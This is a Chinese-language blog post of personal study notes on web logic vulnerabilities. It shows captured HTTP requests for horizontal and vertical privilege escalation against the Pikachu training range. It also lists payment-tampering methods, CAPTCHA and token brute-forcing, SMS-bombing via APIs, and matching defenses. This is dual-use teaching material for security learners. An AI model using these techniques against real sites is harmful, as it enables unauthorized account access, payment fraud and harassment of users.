web逻辑漏洞

越权漏洞
浏览器对用户的提交数据请求没有经过严格的权限设置,导致用户可以拥有观察或更改其他用户信息的功能,
通过ID之类的身份之类的身份标识,从而使a账号获取b账号的
数据等,或者使用低权限用户身份的账号,发送高权限账号才可以有的请求。获取的高权限的操作
通过删除请求中的认证信息后重放该请求,依旧可以访问或者完成操作

越权分为两种
水平越权:用户在权限想同等级下的组,可以进行越权访问,修改,删除数据相同的普通用户可以看到其他普通用户里面的数据。

垂直越权:用户在不同权限下的组,可以进行高级别的权限使用。
比如普通用户可以浏览到特权用户才能看到的页面

防御
前端和后端对用户输入的信息进行校验,双重验证机制
调用功能的验证用户是否有权限调用相关功能
执行关键操作前必须验证用户身份,验证用户是否具备操作数据的权限
敏感/关键接口的读写增加 session鉴权。
对交易参数进行签名校验,防止用户篡改。
开发者尽可能多的考虑用户的反常行为和输入。

皮卡丘靶场水平越权
登录一个用户抓包,更改其他用户名得到其他用户的信息

GET /pikachu-master/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF HTTP/1.1

Host: 192.168.11.12

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://192.168.11.12/pikachu-master/vul/overpermission/op1/op1_mem.php

Connection: close

Cookie: PHPSESSID=b36ho72qn2p0f38qpjutnmu3g7

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

垂直越权
先使用admin账号添加用户抓包,退出进入pikachu账号浏览器抓包获取cookice,把cookice放到第一个包发送添加用户成功

Cookie: PHPSESSID=j6va1sivknpkctcunk7si1rds5

POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1

Host: 192.168.11.12

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 88

Origin: http://192.168.11.12

Connection: close

Referer: http://192.168.11.12/pikachu-master/vul/overpermission/op2/op2_admin_edit.php

Cookie: PHPSESSID=j6va1sivknpkctcunk7si1rds5

Upgrade-Insecure-Requests: 1



username=123qweqaz&password=qaz&sex=&phonenum=&email=&address=&submit=%E5%88%9B%E5%BB%BA

未授权访问漏洞
未授权访问指的是指用户在没有通过认证授权的情况下能够直接访问需要通过认证才能访问的页面或者文本信息,可以尝试在登录某网站前台或后台之后,将相关的页面链接复制到其他浏览器或其他电脑上进行访问,观察是否能访问成功,
未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷
导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露,

漏洞检测
登录某应用访问需要通过认证的页面,切换浏览器再次访问此页面,成功访问则存在
未授权访问漏洞

漏洞修复
对未授权访问页面做sess认证,并且用户访问的每一个URL做身份鉴别,
正确地校验用户ID和token等

WEB漏洞-逻辑漏洞之登录脆弱及支付篡改
登录功能点,检测,危害,修复方案
1,登录暴力破解
2,http/https传输
3,cookice脆弱点
4,session固定点传输
5,密文验证

数据篡改安全问题
商品购买数量
选择商品和数量-选择支付及配送方式-生成订单编号-订单支付选择-完成支付

常见篡改参数
常见编号ID,购买价格,购买数量,支付方式,订单号,支付状态,

常见修改方式
替换支付,重复支付,最小额支付,负数支付,溢出支付,优惠价支付。

操作步骤
HTTP/HTTPS协议密文抓取
后台登录账号爆破测试
cookice脆弱点验证修改测试
某商城系统商品支付逻辑测试数量,订单
某建站系统商品支付逻辑测试价格,订单

WEB漏洞-逻辑漏洞之找回机制及接口安全
找回重置机制
客服端回显,response状态值,验证码爆破,找回流程
接口调用乱用

WEB漏洞-逻辑越权之验证码与Token接口
验证码安全
分类:图片,手机或邮箱,语音,视频,操作
原理:验证码生成或验证过程中有逻辑问题
危害:账户权限泄露,短信轰炸,遍历,任意用户操作
漏洞:客服端回显,验证码复用,验证码爆破,绕过

Token安全
token爆破,token客服端回显等

验证码识别插件工具使用
captcha-killer使用
pkav-Http-fuzz,reCAPTCHA等

接口安全问题
调用,遍历,未授权,篡改
调用案例:短信轰炸
遍历案例:UID等遍历
callback回调:JSONP

个人学习笔记,如有不对请各位大佬指出

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web逻辑漏洞挖掘是信息安全领域中的重要一环。下面将以300字回答web逻辑漏洞挖掘的入门和放弃的过程。 首先,入门阶段通常需要掌握基本的网络协议和web开发知识。了解常见的web请求和响应机制,如HTTP,以及掌握常见的web编程语言和框架,如PHP、Java、ASP.NET等。此外,熟悉数据库操作和常见的web安全机制也是必备的。 其次,需要学习和了解web逻辑漏洞的类型和特点,如会话管理漏洞、访问控制漏洞、输入验证漏洞等。通过阅读相关书籍和学习资源,掌握常见的漏洞利用技术和挖掘工具,如Burp Suite、ZAP等。 在实践阶段,可以选择一些常见的漏洞演练平台进行挖掘实践,如OWASP WebGoat。通过挖掘和利用这些平台上的漏洞,提高自己的技能和经验。同时,还可以参与一些CTF比赛,与其他安全爱好者交流学习,不断提升自己的挖掘能力。 然而,web逻辑漏洞挖掘并非易事,需要持续投入时间和精力。初学者往往会遭遇挫折和困惑。一些复杂的漏洞可能需要深入理解业务逻辑和代码细节才能发现,这需要大量的经验和实践。 随着时间的推移,如果遭遇挖掘困难、缺乏持续学习的动力或遭遇挫败,一些人可能会考虑放弃。这需要权衡个人兴趣、投入和回报,决定是否继续深入研究web逻辑漏洞挖掘,或者将注意力转移到其他安全领域。 总之,web逻辑漏洞挖掘入门并非易事,需要掌握基本的网络和开发知识,学习漏洞类型和利用技术,并持续实践和学习。然而,放弃与否取决于个人情况和投入回报的权衡。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值